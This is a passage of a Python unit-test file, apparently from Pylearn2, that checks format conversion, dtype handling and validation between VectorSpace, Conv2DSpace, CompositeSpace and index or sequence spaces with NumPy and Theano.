data = np.arange(5 * 8 * 8 * 3).reshape(5, 8 * 8 * 3)
rval = vector_space.np_format_as(data, conv2d_space)
# Get data in a Conv2DSpace with default axes
new_axes = conv2d_space.default_axes
axis_to_shape = {'b': 5, 'c': 3, 0: 8, 1: 8}
new_shape = tuple([axis_to_shape[ax] for ax in new_axes])
nval = data.reshape(new_shape)
# Then transpose
nval = nval.transpose(*[new_axes.index(ax)
for ax in conv2d_space.axes])
assert np.all(rval == nval)
def test_np_format_as_conv2d2vector():
vector_space = VectorSpace(dim=8 * 8 * 3, sparse=False)
conv2d_space = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
data = np.arange(5 * 8 * 8 * 3).reshape(5, 3, 8, 8)
rval = conv2d_space.np_format_as(data, vector_space)
nval = data.transpose(*[conv2d_space.axes.index(ax)
for ax in conv2d_space.default_axes])
nval = nval.reshape(5, 3 * 8 * 8)
assert np.all(rval == nval)
vector_space = VectorSpace(dim=8 * 8 * 3, sparse=False)
conv2d_space = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('c', 'b', 0, 1))
data = np.arange(5 * 8 * 8 * 3).reshape(3, 5, 8, 8)
rval = conv2d_space.np_format_as(data, vector_space)
nval = data.transpose(*[conv2d_space.axes.index(ax)
for ax in conv2d_space.default_axes])
nval = nval.reshape(5, 3 * 8 * 8)
assert np.all(rval == nval)
def test_np_format_as_conv2d_vector_conv2d():
conv2d_space1 = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('c', 'b', 1, 0))
vector_space = VectorSpace(dim=8 * 8 * 3, sparse=False)
conv2d_space0 = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
data = np.arange(5 * 8 * 8 * 3).reshape(5, 3, 8, 8)
vecval = conv2d_space0.np_format_as(data, vector_space)
rval1 = vector_space.np_format_as(vecval, conv2d_space1)
rval2 = conv2d_space0.np_format_as(data, conv2d_space1)
assert np.allclose(rval1, rval2)
nval = data.transpose(1, 0, 3, 2)
assert np.allclose(nval, rval1)
def test_np_format_as_vectorsequence2vectorsequence():
vector_sequence_space1 = VectorSequenceSpace(dim=3, dtype='float32')
vector_sequence_space2 = VectorSequenceSpace(dim=3, dtype='float64')
data = np.asarray(np.random.uniform(low=0.0,
high=1.0,
size=(10, 3)),
dtype=vector_sequence_space1.dtype)
rval = vector_sequence_space1.np_format_as(data, vector_sequence_space2)
assert np.all(rval == data)
def test_np_format_as_indexsequence2indexsequence():
index_sequence_space1 = IndexSequenceSpace(max_labels=6, dim=1,
dtype='int16')
index_sequence_space2 = IndexSequenceSpace(max_labels=6, dim=1,
dtype='int32')
data = np.asarray(np.random.randint(low=0,
high=5,
size=(10, 1)),
dtype=index_sequence_space1.dtype)
rval = index_sequence_space1.np_format_as(data, index_sequence_space2)
assert np.all(rval == data)
def test_np_format_as_indexsequence2vectorsequence():
index_sequence_space = IndexSequenceSpace(max_labels=6, dim=1)
vector_sequence_space = VectorSequenceSpace(dim=6)
data = np.array([[0], [1], [4], [3]],
dtype=index_sequence_space.dtype)
rval = index_sequence_space.np_format_as(data, vector_sequence_space)
true_val = np.array([[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 1, 0, 0]])
assert np.all(rval == true_val)
def test_np_format_as_sequence2other():
vector_sequence_space = VectorSequenceSpace(dim=3)
vector_space = VectorSpace(dim=3)
data = np.random.uniform(low=0.0, high=1.0, size=(10, 3))
np.testing.assert_raises(ValueError, vector_sequence_space.np_format_as,
data, vector_space)
index_sequence_space = IndexSequenceSpace(max_labels=6, dim=1)
index_space = IndexSpace(max_labels=6, dim=1)
data = np.random.randint(low=0, high=5, size=(10, 1))
np.testing.assert_raises(ValueError, index_sequence_space.np_format_as,
data, index_space)
def test_np_format_as_composite_composite():
"""
Test using CompositeSpace.np_format_as() to convert between
composite spaces that have the same tree structure, but different
leaf spaces.
"""
def make_composite_space(image_space):
"""
Returns a compsite space with a particular tree structure.
"""
return CompositeSpace((CompositeSpace((image_space,) * 2),
VectorSpace(dim=1)))
shape = np.array([8, 11])
channels = 3
datum_size = channels * shape.prod()
composite_topo = make_composite_space(Conv2DSpace(shape=shape,
num_channels=channels))
composite_flat = make_composite_space(VectorSpace(dim=datum_size))
def make_vector_data(batch_size, space):
"""
Returns a batch of synthetic data appropriate to the provided space.
Supports VectorSpaces, and CompositeSpaces of VectorSpaces. synthetic
data.
"""
if isinstance(space, CompositeSpace):
return tuple(make_vector_data(batch_size, subspace)
for subspace in space.components)
else:
assert isinstance(space, VectorSpace)
result = np.random.rand(batch_size, space.dim)
if space.dtype is not None:
return np.asarray(result, dtype=space.dtype)
else:
return result
batch_size = 5
flat_data = make_vector_data(batch_size, composite_flat)
composite_flat.np_validate(flat_data)
topo_data = composite_flat.np_format_as(flat_data, composite_topo)
composite_topo.np_validate(topo_data)
new_flat_data = composite_topo.np_format_as(topo_data,
composite_flat)
def get_shape(batch):
"""
Returns the (nested) shape(s) of a (nested) batch.
"""
if isinstance(batch, np.ndarray):
return batch.shape
else:
return tuple(get_shape(b) for b in batch)
def batch_equals(batch_0, batch_1):
"""
Returns true if all corresponding elements of two batches are
equal. Supports composite data (i.e. nested tuples of data).
"""
assert type(batch_0) == type(batch_1)
if isinstance(batch_0, tuple):
if len(batch_0) != len(batch_1):
return False
return np.all(tuple(batch_equals(b0, b1)
for b0, b1 in zip(batch_0, batch_1)))
else:
assert isinstance(batch_0, np.ndarray)
return np.all(batch_0 == batch_1)
assert batch_equals(new_flat_data, flat_data)
def test_vector_to_conv_c01b_invertible():
"""
Tests that the format_as methods between Conv2DSpace
and VectorSpace are invertible for the ('c', 0, 1, 'b')
axis format.
"""
rng = np.random.RandomState([2013, 5, 1])
batch_size = 3
rows = 4
cols = 5
channels = 2
conv = Conv2DSpace([rows, cols],
channels=channels,
axes=('c', 0, 1, 'b'))
vec = VectorSpace(conv.get_total_dimension())
X = conv.make_batch_theano()
Y = conv.format_as(X, vec)
Z = vec.format_as(Y, conv)
A = vec.make_batch_theano()
B = vec.format_as(A, conv)
C = conv.format_as(B, vec)
f = function([X, A], [Z, C])
X = rng.randn(*(conv.get_origin_batch(batch_size).shape)).astype(X.dtype)
A = rng.randn(*(vec.get_origin_batch(batch_size).shape)).astype(A.dtype)
Z, C = f(X, A)
np.testing.assert_allclose(Z, X)
np.testing.assert_allclose(C, A)
def test_broadcastable():
v = VectorSpace(5).make_theano_batch(batch_size=1)
np.testing.assert_(v.broadcastable[0])
c = Conv2DSpace((5, 5), channels=3,
axes=['c', 0, 1, 'b']).make_theano_batch(batch_size=1)
np.testing.assert_(c.broadcastable[-1])
d = Conv2DSpace((5, 5), channels=3,
axes=['b', 0, 1, 'c']).make_theano_batch(batch_size=1)
np.testing.assert_(d.broadcastable[0])
def test_compare_index():
dims = [5, 5, 5, 6]
max_labels = [10, 10, 9, 10]
index_spaces = [IndexSpace(dim=dim, max_labels=max_label)
for dim, max_label in zip(dims, max_labels)]
assert index_spaces[0] == index_spaces[1]
assert not any(index_spaces[i] == index_spaces[j]
for i, j in itertools.combinations([1, 2, 3], 2))
vector_space = VectorSpace(dim=5)
conv2d_space = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
composite_space = CompositeSpace((index_spaces[0],))
assert not any(index_space == vector_space for index_space in index_spaces)
assert not any(index_space == composite_space
for index_space in index_spaces)
assert not any(index_space == conv2d_space for index_space in index_spaces)
def test_np_format_as_index2vector():
# Test 5 random batches for shape, number of non-zeros
for _ in xrange(5):
max_labels = np.random.randint(2, 10)
batch_size = np.random.randint(1, 10)
labels = np.random.randint(1, 10)
batch = np.random.random_integers(max_labels - 1,
size=(batch_size, labels))
index_space = IndexSpace(dim=labels, max_labels=max_labels)
vector_space_merge = VectorSpace(dim=max_labels)
vector_space_concatenate = VectorSpace(dim=max_labels * labels)
merged = index_space.np_format_as(batch, vector_space_merge)
concatenated = index_space.np_format_as(batch,
vector_space_concatenate)
assert merged.shape == (batch_size, max_labels)
assert concatenated.shape == (batch_size, max_labels * labels)
assert np.count_nonzero(merged) <= batch.size
assert np.count_nonzero(concatenated) == batch.size
assert np.all(np.unique(concatenated) == np.array([0, 1]))
# Make sure Theano variables give the same result
batch = tensor.lmatrix('batch')
single = tensor.lvector('single')
batch_size = np.random.randint(1, 10)
np_batch = np.random.random_integers(max_labels - 1,
size=(batch_size, labels))
np_single = np.random.random_integers(max_labels - 1,
size=(labels))
f_batch_merge = theano.function(
[batch], index_space._format_as_impl(False, batch, vector_space_merge)
)
f_batch_concatenate = theano.function(
[batch], index_space._format_as_impl(False, batch,
vector_space_concatenate)
)
f_single_merge = theano.function(
[single], index_space._format_as_impl(False, single,
vector_space_merge)
)
f_single_concatenate = theano.function(
[single], index_space._format_as_impl(False, single,
vector_space_concatenate)
)
np.testing.assert_allclose(
f_batch_merge(np_batch),
index_space._format_as_impl(True, np_batch, vector_space_merge)
)
np.testing.assert_allclose(
f_batch_concatenate(np_batch),
index_space._format_as_impl(True, np_batch, vector_space_concatenate)
)
np.testing.assert_allclose(
f_single_merge(np_single),
index_space._format_as_impl(True, np_single, vector_space_merge)
)
np.testing.assert_allclose(
f_single_concatenate(np_single),
index_space._format_as_impl(True, np_single, vector_space_concatenate)
)
def test_dtypes():
batch_size = 2
dtype_is_none_msg = ("self.dtype is None, so you must provide a "
"non-None dtype argument to this method.")
all_scalar_dtypes = tuple(t.dtype
for t in theano.scalar.all_types)
def underspecifies_dtypes(from_space, to_dtype):
"""
Returns True iff the from_space and to_dtype are both None. If
from_space is a CompositeSpace, this recurses into its tree of
subspaces.
"""
if isinstance(from_space, CompositeSpace):
if not isinstance(to_dtype, tuple):
return any(underspecifies_dtypes(s, to_dtype)
for s in from_space.components)
else:
return any(underspecifies_dtypes(s, d)
for s, d
in safe_zip(from_space.components, to_dtype))
else:
assert not isinstance(to_dtype, tuple), ("Tree structure "
"mismatch between "
"from_space and "
"to_dtype.")
return from_space.dtype is None and to_dtype is None
def get_expected_batch_dtype(from_space, to_dtype):
"""
Returns the expected dtype of a batch returned from
from_space.f(batch, to_dtype), where f is one of the three batch
creation methods (get_origin_batch, make_theano_batch, and
make_shared_batch)
"""
if to_dtype == 'floatX':
to_dtype = theano.config.floatX
if isinstance(from_space, CompositeSpace):
if not isinstance(to_dtype, tuple):
to_dtype = (to_dtype, ) * len(from_space.components)
return tuple(get_expected_batch_dtype(subspace, subtype)
for subspace, subtype
in safe_zip(from_space.components, to_dtype))
else:
assert not (from_space.dtype is None and to_dtype is None)
return from_space.dtype if to_dtype is None else to_dtype
def get_batch_dtype(batch):
"""
Returns the dtype of a batch, as a string, or nested tuple of strings.
For simple batches such as ndarray, this returns str(batch.dtype).
For the None batches "used" by NullSpace, this returns a special string
"NullSpace dtype".
For composite batches, this returns (nested) tuples of dtypes.
"""
if isinstance(batch, tuple):
return tuple(get_batch_dtype(b) for b in batch)
elif batch is None:
return "NullSpace dtype"
else:
return batch.dtype
def test_get_origin_batch(from_space, to_type):
# Expect failure if neither we nor the from_space specifies a dtype
if underspecifies_dtypes(from_space, to_type):
try:
from_space.get_origin_batch(batch_size, dtype=to_type)
except TypeError as ex:
assert dtype_is_none_msg in str(ex)
except Exception as unexpected_ex:
print("Expected an exception of type TypeError with message "
"%s, got a %s instead with message %s." %
(dtype_is_none_msg,
type(unexpected_ex),
str(unexpected_ex)))
raise unexpected_ex
finally:
return
batch = from_space.get_origin_batch(batch_size, dtype=to_type)
assert get_batch_dtype(batch) == get_expected_batch_dtype(from_space,
to_type)
def test_make_shared_batch(from_space, to_type):
if underspecifies_dtypes(from_space, to_type):
try:
from_space.make_shared_batch(batch_size, dtype=to_type)
except TypeError as ex:
assert dtype_is_none_msg in str(ex)
except Exception as unexpected_ex:
print("Expected an exception of type TypeError with message "
"%s, got a %s instead with message %s." %
(dtype_is_none_msg,
type(unexpected_ex),
str(unexpected_ex)))
raise unexpected_ex
finally:
return
batch = from_space.make_shared_batch(batch_size=batch_size,
name='batch',
dtype=to_type)
assert (get_batch_dtype(batch) ==
get_expected_batch_dtype(from_space, to_type)), \
("\nget_batch_dtype(batch): %s\n"
"get_expected_batch_dtype(from_space, to_type): %s" %
(get_batch_dtype(batch),
get_expected_batch_dtype(from_space, to_type)))
def test_make_theano_batch(from_space, to_type):
kwargs = {'name': 'batch',
'dtype': to_type}
# Sparse VectorSpaces throw an exception if batch_size is specified.
if not (isinstance(from_space, VectorSpace) and from_space.sparse):
kwargs['batch_size'] = batch_size
if underspecifies_dtypes(from_space, to_type):
try:
from_space.make_theano_batch(**kwargs)
except TypeError as ex:
assert dtype_is_none_msg in str(ex)
except Exception as unexpected_ex:
print("Expected an exception of type TypeError with message "
"%s, got a %s instead with message %s." %
(dtype_is_none_msg,
type(unexpected_ex),
str(unexpected_ex)))
raise unexpected_ex
finally:
return
batch = from_space.make_theano_batch(**kwargs)
assert get_batch_dtype(batch) == get_expected_batch_dtype(from_space,
to_type)
def test_format(from_space, to_space, using_numeric_batch):
"""
Unit test for a call to from_space.np_format_as(batch, to_space)
"""
# Type-checks the arguments
for space, name in zip((from_space, to_space),
("from_space", "to_space")):
if not isinstance(space,
(VectorSpace, Conv2DSpace, CompositeSpace)):
raise TypeError("This test only supports spaces of type "
"VectorSpace, Conv2DSpace, and "
"CompositeSpace, not %s's type %s" %
(name, type(space)))
def get_batch(space, using_numeric_batch):
"""
Uses space.get_origin_batch() to return a numeric batch,
or space.get_theano_batch() to return a symbolic
Uses a fallback dtype if the space itself doesn't have one.
"""
def specifies_all_dtypes(space):
"""
Returns True iff space has a completely specified dtype.
"""
if isinstance(space, CompositeSpace):
return all(specifies_all_dtypes(subspace)
for subspace in space.components)
else:
return space.dtype is not None
def replace_none_dtypes(dtype, fallback_dtype):
"""
Returns dtype, with any Nones replaced by fallback_dtype.
"""
if isinstance(dtype, tuple):
return tuple(replace_none_dtypes(d, fallback_dtype)
for d in dtype)
else:
return fallback_dtype if dtype is None else dtype
kwargs = {"batch_size": batch_size}
# Use this when space doesn't specify a dtype
fallback_dtype = theano.config.floatX
if not specifies_all_dtypes(space):
kwargs["dtype"] = replace_none_dtypes(space.dtype,
fallback_dtype)
if using_numeric_batch:
return space.get_origin_batch(**kwargs)
else:
# Sparse VectorSpaces throw an exception if batch_size is
# specified
if isinstance(space, VectorSpace) and space.sparse:
del kwargs["batch_size"]
kwargs["name"] = "space-generated batch"
return space.make_theano_batch(**kwargs)
def get_expected_warning(from_space, from_batch, to_space):
# composite -> composite
if isinstance(from_space, CompositeSpace) and \
isinstance(to_space, CompositeSpace):
for fs, fb, ts in safe_zip(from_space.components,
from_batch,
to_space.components):
warning, message = get_expected_warning(fs, fb, ts)
if warning is not None:
return warning, message
return None, None
# composite -> simple
if isinstance(from_space, CompositeSpace):
for fs, fb in safe_zip(from_space.components, from_batch):
warning, message = get_expected_warning(fs, fb, to_space)
if warning is not None:
return warning, message
return None, None
# simple -> composite
if isinstance(to_space, CompositeSpace):
if isinstance(from_space, VectorSpace) and \
isinstance(from_batch, theano.sparse.SparseVariable):
assert from_space.sparse
return (UserWarning,
'Formatting from a sparse VectorSpace to a '
'CompositeSpace is currently (2 Jan 2014) a '
'non-differentiable action. This is because it '
'calls slicing operations on a sparse batch '
'(e.g. "my_matrix[r:R, c:C]", which Theano does '
'not yet have a gradient operator for. If '
'autodifferentiation is reporting an error, '
'this may be why.')
for ts in to_space.components:
warning, message = get_expected_warning(from_space,
from_batch,
ts)
if warning is not None:
return warning, message
return None, None
# simple -> simple
return None, None
def get_expected_error(from_space, from_batch, to_space):
"""
Returns the type of error to be expected when calling
from_space.np_format_as(batch, to_space). Returns None if no error
should be expected.
"""
def contains_different_dtypes(space):
"""
Returns true if space contains different dtypes. None is
considered distinct from all actual dtypes.
"""
assert isinstance(space, CompositeSpace)
def get_shared_dtype_if_any(space):
"""
Returns space's dtype. If space is composite, returns the
dtype used by all of its subcomponents. Returns False if
the subcomponents use different dtypes.
"""
if isinstance(space, CompositeSpace):
dtypes = tuple(get_shared_dtype_if_any(c)
for c in space.components)
assert(len(dtypes) > 0)
if any(d != dtypes[0] for d in dtypes[1:]):
return False
return dtypes[0] # could be False, but that's fine
else:
return space.dtype
return get_shared_dtype_if_any(space) is False
assert (isinstance(from_space, CompositeSpace) ==
isinstance(from_batch, tuple))
# composite -> composite
if isinstance(from_space, CompositeSpace) and \
isinstance(to_space, CompositeSpace):
for fs, fb, ts in safe_zip(from_space.components,
from_batch,
to_space.components):
error, message = get_expected_error(fs, fb, ts)
if error is not None:
return error, message
return None, None
# composite -> simple
if isinstance(from_space, CompositeSpace):
if isinstance(to_space, Conv2DSpace):
return (NotImplementedError,
"CompositeSpace does not know how to format as "
"Conv2DSpace")
for fs, fb in safe_zip(from_space.components, from_batch):
error, message = get_expected_error(fs, fb, to_space)
if error is not None:
return error, message
if isinstance(to_space, VectorSpace) and \
contains_different_dtypes(from_space) and \
to_space.dtype is None:
return (TypeError,
"Tried to format components with differing dtypes "
"into a VectorSpace with no dtype of its own. "
"dtypes: ")
return None, None
# simple -> composite
if isinstance(to_space, CompositeSpace):
if isinstance(from_space, VectorSpace) and \
isinstance(from_batch, theano.sparse.SparseVariable):
assert from_space.sparse
return (UserWarning,
'Formatting from a sparse VectorSpace to a '
'CompositeSpace is currently (2 Jan 2014) a '
'non-differentiable action. This is because it '
'calls slicing operations on a sparse batch '
'(e.g. "my_matrix[r:R, c:C]", which Theano does '
'not yet have a gradient operator for. If '
'autodifferentiation is reporting an error, '
'this may be why.')
if isinstance(from_space, Conv2DSpace):
return (NotImplementedError,
"Conv2DSpace does not know how to format as "
"CompositeSpace")
for ts in to_space.components:
error, message = get_expected_error(from_space,
from_batch,
ts)
if error is not None:
return error, message
return None, None
#
# simple -> simple
#
def is_sparse(space):
return isinstance(space, VectorSpace) and space.sparse
def is_complex(arg):
"""
Returns whether a space or a batch has a complex dtype.
"""
return (arg.dtype is not None and
str(arg.dtype).startswith('complex'))
if isinstance(from_batch, tuple):
return (TypeError,
"This space only supports simple dtypes, but received "
"a composite batch.")
if is_complex(from_batch) and not is_complex(from_space):
return (TypeError,
"This space has a non-complex dtype (%s), and "
"thus cannot support complex batches of type %s." %
(from_space.dtype, from_batch.dtype))
if from_space.dtype is not None and \
from_space.dtype != from_batch.dtype:
return (TypeError,
"This space is for dtype %s, but recieved a "
"batch of dtype %s." %
(from_space.dtype, from_batch.dtype))
if is_sparse(from_space) and isinstance(to_space, Conv2DSpace):
return (TypeError,
"Formatting a SparseVariable to a Conv2DSpace "
"is not supported, since neither scipy nor "
"Theano has sparse tensors with more than 2 "
"dimensions. We need 4 dimensions to "
"represent a Conv2DSpace batch")
if is_complex(from_space) and not is_complex(to_space):
if is_symbolic_batch(from_batch):
return (TypeError,
"Casting from complex to real is ambiguous")
else:
return (np.ComplexWarning,
"Casting complex values to real discards the "
"imaginary part")
return None, None
def get_expected_formatted_dtype(from_batch, to_space):
"""
Returns the expected dtype of the batch returned from a call to
from_batch.format_as(batch, to_space). If the returned batch is a
nested tuple, the expected dtype will also a nested tuple.
"""
def get_single_dtype(batch):
"""
Returns the dtype shared by all leaf nodes of the nested batch.
If the nested batch contains differing dtypes, this throws an
AssertionError. None counts as a different dtype than non-None.
"""
if isinstance(batch, tuple):
assert len(batch) > 0
child_dtypes = tuple(get_single_dtype(b) for b in batch)
if any(c != child_dtypes[0] for c in child_dtypes[1:]):
return False
return child_dtypes[0] # may be False, but that's correct.
else:
return batch.dtype
# composite -> composite
if isinstance(from_batch, tuple) and \
isinstance(to_space, CompositeSpace):
return tuple(get_expected_formatted_dtype(b, s)
for b, s in safe_zip(from_batch,
to_space.components))
# composite -> simple
elif isinstance(from_batch, tuple):
if to_space.dtype is not None:
return to_space.dtype
else:
result = get_batch_dtype(from_batch)
if result is False:
raise TypeError("From_batch doesn't have a single "
"dtype: %s" %
str(get_batch_dtype(from_batch)))
return result
# simple -> composite
elif isinstance(to_space, CompositeSpace):
return tuple(get_expected_formatted_dtype(from_batch, s)
for s in to_space.components)
# simple -> simple with no dtype
elif to_space.dtype is None:
assert from_batch.dtype is not None
return str(from_batch.dtype)
# simple -> simple with a dtype
else:
return to_space.dtype
from_batch = get_batch(from_space, using_numeric_batch)
expected_error, expected_error_msg = get_expected_error(from_space,
from_batch,
to_space)
# For some reason, the "with assert_raises(expected_error) as context:"
# idiom isn't catching all the expceted_errors. Use this instead:
if expected_error is not None:
try:
# temporarily upgrades warnings to exceptions within this block
with warnings.catch_warnings():
warnings.simplefilter("error")
from_space._format_as(using_numeric_batch,
from_batch,
to_space)
except expected_error as ex:
assert str(ex).find(expected_error_msg) >= 0
except Exception as unknown_ex:
print("Expected exception of type %s, got %s." %
(expected_error.__name__, type(unknown_ex)))
raise unknown_ex
finally:
return
to_batch = from_space._format_as(using_numeric_batch,
from_batch,
to_space)
expected_dtypes = get_expected_formatted_dtype(from_batch, to_space)
actual_dtypes = get_batch_dtype(to_batch)
assert expected_dtypes == actual_dtypes, \
("\nexpected_dtypes: %s,\n"
"actual_dtypes: %s \n"
"from_space: %s\n"
"from_batch's dtype: %s\n"
"from_batch is theano?: %s\n"
"to_space: %s" % (expected_dtypes,
actual_dtypes,
from_space,
get_batch_dtype(from_batch),
is_symbolic_batch(from_batch),
to_space))
#
#
# End of test_format() function.
def test_dtype_getter(space):
"""
Tests the getter method of space's dtype property.
"""
def assert_composite_dtype_eq(space, dtype):
"""
Asserts that dtype is a nested tuple with exactly the same tree
structure as space, and that the dtypes of space's components and
their corresponding elements in <dtype> are equal.
"""
assert (isinstance(space, CompositeSpace) ==
isinstance(dtype, tuple))
if isinstance(space, CompositeSpace):
for s, d in safe_zip(space.components, dtype):
assert_composite_dtype_eq(s, d)
else:
assert space.dtype == dtype
if isinstance(space, SimplyTypedSpace):
assert space.dtype == space._dtype
elif isinstance(space, NullSpace):
assert space.dtype == "NullSpace's dtype"
elif isinstance(space, CompositeSpace):
assert_composite_dtype_eq(space, space.dtype)
def test_dtype_setter(space, dtype):
"""
Tests the setter method of space's dtype property.
"""
def get_expected_error(space, dtype):
"""
If calling space.dtype = dtype is expected to throw an exception,
this returns (exception_class, exception_message).
If no exception is to be expected, this returns (None, None).
"""
if isinstance(space, CompositeSpace):
if isinstance(dtype, tuple):
if len(space.components) != len(dtype):
return ValueError, "Argument 0 has length "
for s, d in safe_zip(space.components, dtype):
error, message = get_expected_error(s, d)
if error is not None:
return error, message
else:
for s in space.components:
error, message = get_expected_error(s, dtype)
if error is not None:
return error, message
return None, None
if isinstance(space, SimplyTypedSpace):
if not any((dtype is None,
dtype == 'floatX',
dtype in all_scalar_dtypes)):
return (TypeError,
'Unrecognized value "%s" (type %s) for dtype arg' %
(dtype, type(dtype)))
return None, None
if isinstance(space, NullSpace):
nullspace_dtype = NullSpace().dtype
if dtype != nullspace_dtype:
return (TypeError,
'NullSpace can only take the bogus dtype "%s"' %
nullspace_dtype)
return None, None
raise NotImplementedError("%s not yet supported by this test" %
type(space))
def assert_dtype_equiv(space, dtype):
"""
Asserts that space.dtype and dtype are equivalent.
"""
if isinstance(space, CompositeSpace):
if isinstance(dtype, tuple):
for s, d in safe_zip(space.components, dtype):
assert_dtype_equiv(s, d)
else:
for s in space.components:
assert_dtype_equiv(s, dtype)
else:
assert not isinstance(dtype, tuple)
if dtype == 'floatX':
dtype = theano.config.floatX
assert space.dtype == dtype, ("%s not equal to %s" %
(space.dtype, dtype))
expected_error, expected_message = get_expected_error(space, dtype)
if expected_error is not None:
try:
space.dtype = dtype
except expected_error as ex:
assert expected_message in str(ex)
except Exception:
print("Expected exception of type %s, got %s instead." %
(expected_error.__name__, type(ex)))
raise ex
return
else:
space.dtype = dtype
assert_dtype_equiv(space, dtype)
def test_simply_typed_space_validate(space, batch_dtype, is_numeric):
"""
Creates a batch of batch_dtype, and sees if space validates it.
"""
assert isinstance(space, SimplyTypedSpace), \
"%s is not a SimplyTypedSpace" % type(space)
batch_sizes = (1, 3)
if not is_numeric and isinstance(space, VectorSpace) and space.sparse:
batch_sizes = (None, )
for batch_size in batch_sizes:
if is_numeric:
batch = space.get_origin_batch(dtype=batch_dtype,
batch_size=batch_size)
else:
batch = space.make_theano_batch(dtype=batch_dtype,
batch_size=batch_size,
name="test batch to validate")
# Expect an error if space.dtype is not None and batch can't cast
# to it.
if space.dtype is not None and \
not np.can_cast(batch.dtype, space.dtype):
np.testing.assert_raises(TypeError,
space._validate,
(is_numeric, batch))
else:
# Otherwise, don't expect an error.
space._validate(is_numeric, batch)
#
#
# End of test_dtype_setter() function
shape = np.array([2, 3, 4], dtype='int')
assert len(shape) == 3 # This test depends on this being true
dtypes = ('floatX', None) + all_scalar_dtypes
#
# spaces with the same number of elements
#
vector_spaces = tuple(VectorSpace(dim=shape.prod(), dtype=dt, sparse=s)
for dt in dtypes for s in (True, False))
conv2d_spaces = tuple(Conv2DSpace(shape=shape[:2],
dtype=dt,
num_channels=shape[2])
for dt in dtypes)
# no need to make CompositeSpaces with components spanning all possible
# dtypes. Just try 2 dtype combos. No need to try different sparsities
# either. That will be tested by the non-composite space conversions.
n_dtypes = 2
old_nchannels = shape[2]
shape[2] = old_nchannels / 2
assert shape[2] * 2 == old_nchannels, \
("test code is broken: # of channels should start as an even "
"number, not %d." % old_nchannels)
def make_composite_space(dtype0, dtype1, use_conv2d):
if use_conv2d:
second_space = Conv2DSpace(shape=shape[:2],
dtype=dtype1,
num_channels=shape[2])
else:
second_space = VectorSpace(dim=np.prod(shape),
dtype=dtype1)
return CompositeSpace((VectorSpace(dim=shape.prod(), dtype=dtype0),
second_space))
composite_spaces = tuple(make_composite_space(dtype0, dtype1, use_conv2d)
for dtype0, dtype1 in zip(dtypes[:n_dtypes],
dtypes[-n_dtypes:])
for use_conv2d in [True, False])
del n_dtypes
# A few composite dtypes to try throwing at CompositeSpace's batch-making
# methods.
composite_dtypes = ((None, 'int8'),
('complex128', theano.config.floatX))
# Tests CompositeSpace's batch-making methods and dtype setter
# with composite dtypes
for from_space in composite_spaces:
for to_dtype in composite_dtypes:
test_get_origin_batch(from_space, to_dtype)
test_make_shared_batch(from_space, to_dtype)
test_make_theano_batch(from_space, to_dtype)
test_dtype_setter(from_space, to_dtype)
# Tests validate/np_validate() for SimplyTypedSpaces
for is_numeric in (True, False):
for space in vector_spaces + conv2d_spaces:
for batch_dtype in ('floatX', ) + all_scalar_dtypes:
# Skip the test if the symbolic SparseType does not implement
# that dtype. As of 2015-05-07, this happens for 'float16'.
if ((isinstance(space, VectorSpace) and
space.sparse and
batch_dtype in all_scalar_dtypes and
batch_dtype not in theano.sparse.SparseType.dtype_set)):
continue
test_simply_typed_space_validate(space,
batch_dtype,
is_numeric)
all_spaces = vector_spaces + conv2d_spaces + composite_spaces
for from_space in all_spaces:
test_dtype_getter(from_space)
# Tests batch-making and dtype setting methods with non-composite
# dtypes.
for to_dtype in dtypes:
# Skip the test if the symbolic SparseType does not implement
# that dtype. As of 2015-05-07, this happens for 'float16'.
if ((isinstance(from_space, VectorSpace) and
from_space.sparse and
to_dtype in all_scalar_dtypes and
to_dtype not in theano.sparse.SparseType.dtype_set)):
continue
test_get_origin_batch(from_space, to_dtype)
test_make_shared_batch(from_space, to_dtype)
test_make_theano_batch(from_space, to_dtype)
test_dtype_setter(from_space, to_dtype)
# Tests _format_as
for to_space in all_spaces:
# Skip the test if the symbolic SparseType does not implement
# that dtype. As of 2015-05-07, this happens for 'float16'.
if ((isinstance(to_space, VectorSpace) and
to_space.sparse and
to_space.dtype in all_scalar_dtypes and
to_space.dtype not in theano.sparse.SparseType.dtype_set)):
continue
for is_numeric in (True, False):
test_format(from_space, to_space, is_numeric)
def test_symbolic_undo_format_as():
"""
Test functionality of undo_format_as on symbolic batches.
After format_as and undo_format_as, the theano variable
should be the same object, not just an equivalent
variable.
"""
# Compare identity of Composite batches
def assert_components(batch1, batch2):
for e1, e2 in zip(batch1, batch2):
if isinstance(e1, tuple) and isinstance(e2, tuple):
assert_components(e1, e2)
elif isinstance(e1, tuple) or isinstance(e2, tuple):
raise ValueError('Composite batches do not match.')
else:
assert e1 is e2
# VectorSpace and Conv2DSpace
VS = VectorSpace(dim=27)
VS_sparse = VectorSpace(dim=27, sparse=True)
# VectorSpace to Sparse VectorSpace
VS_batch = VS.make_theano_batch()
new_SVS_batch = VS.format_as(VS_batch, VS_sparse)
new_VS_batch = VS.undo_format_as(new_SVS_batch, VS_sparse)
assert new_VS_batch is VS_batch
assert new_SVS_batch is not VS_batch
# ConvSpace to ConvSpace
CS = Conv2DSpace(shape=[3, 3],
num_channels=3,
axes=('b', 0, 1, 'c'),
dtype='float32')
CS_non_default = Conv2DSpace(shape=[3, 3],
num_channels=3,
axes=('c', 'b', 0, 1),
dtype='float64')
CS_batch = CS.make_theano_batch()
new_ndCS_batch = CS.format_as(CS_batch, CS_non_default)
new_CS_batch = CS.undo_format_as(new_ndCS_batch, CS_non_default)
assert new_CS_batch is CS_batch
assert new_ndCS_batch is not CS_batch
assert new_ndCS_batch.dtype == 'float64'
assert new_CS_batch.dtype == 'float32'
ndCS_batch = CS_non_default.make_theano_batch()
new_CS_batch = CS_non_default.format_as(ndCS_batch, CS)
new_ndCS_batch = CS_non_default.undo_format_as(new_CS_batch, CS)
assert new_ndCS_batch is ndCS_batch
assert new_CS_batch is not ndCS_batch
assert new_ndCS_batch.dtype == 'float64'
assert new_CS_batch.dtype == 'float32'
# Start in VectorSpace
VS_batch = VS.make_theano_batch()
new_CS_batch = VS.format_as(VS_batch, CS)
new_VS_batch = VS.undo_format_as(new_CS_batch, CS)
assert new_VS_batch is VS_batch
